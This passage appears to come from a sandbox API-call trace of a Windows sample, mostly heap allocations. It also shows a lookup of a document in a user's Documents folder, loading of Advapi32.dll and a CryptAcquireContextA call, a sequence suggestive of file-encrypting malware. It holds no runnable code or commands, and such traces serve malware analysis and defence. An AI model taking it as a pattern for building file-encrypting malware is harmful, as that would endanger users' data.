Flags=0x0, Size=0x10) returned 0x2e51628 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51640 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55058 [0268.353] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51880 [0268.353] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517f0 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54328 | out: hHeap=0x970000) returned 1 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.354] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51748 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0268.354] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.354] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.354] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/ypyYdQHgVdPHUEe.odt", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1259e1c0, ftCreationTime.dwHighDateTime=0x1d5ed73, ftLastAccessTime.dwLowDateTime=0xfd20f8d0, ftLastAccessTime.dwHighDateTime=0x1d5e6a0, ftLastWriteTime.dwLowDateTime=0xfd20f8d0, ftLastWriteTime.dwHighDateTime=0x1d5e6a0, nFileSizeHigh=0x0, nFileSizeLow=0x119ea, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="ypyYdQHgVdPHUEe.odt", cAlternateFileName="YPYYDQ~1.ODT")) returned 0xa874d0 [0268.355] FindClose (in: hFindFile=0xa874d0 | out: hFindFile=0xa874d0) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51760 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0268.355] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.355] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51628 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51760 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.355] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51628 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.356] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.356] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51628 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0268.356] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55a40 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.356] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51670 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.356] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.356] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0268.356] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0268.357] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e516e8 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b38 | out: hHeap=0x970000) returned 1 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51940 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51958 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0268.357] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51670 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519b8 [0268.357] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.358] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519b8 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51670 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e516e8 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51958 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54198 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.358] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.358] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55ea0 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.358] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55ea0 | out: hHeap=0x970000) returned 1 [0268.358] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ee8 [0268.358] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51970 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51b20 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519a0 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0268.359] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.359] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519a0 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54440 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.359] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51970 | out: hHeap=0x970000) returned 1 [0268.359] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.359] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518f8 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51bb0 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a30 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a48 [0268.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e518f8 | out: hHeap=0x970000) returned 1 [0268.360] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0268.360] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51910 | out: hHeap=0x970000) returned 1 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0268.360] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0268.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.361] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51988 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e519d0 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b08 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0268.361] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0268.361] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55a40 | out: hHeap=0x970000) returned 1 [0268.361] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0268.361] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0268.361] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.361] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0268.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e698c8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0268.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b80 | out: hHeap=0x970000) returned 1 [0268.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0268.362] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2e69ba8, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0268.362] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a00 | out: hHeap=0x970000) returned 1 [0268.362] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa5f958) returned 1 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f15178 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51af0 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b20 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51aa8 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0268.363] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b20 | out: hHeap=0x970000) returned 1 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51aa8 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a00 [0268.363] RtlAllocateHeap (HeapHandle=0x970000, 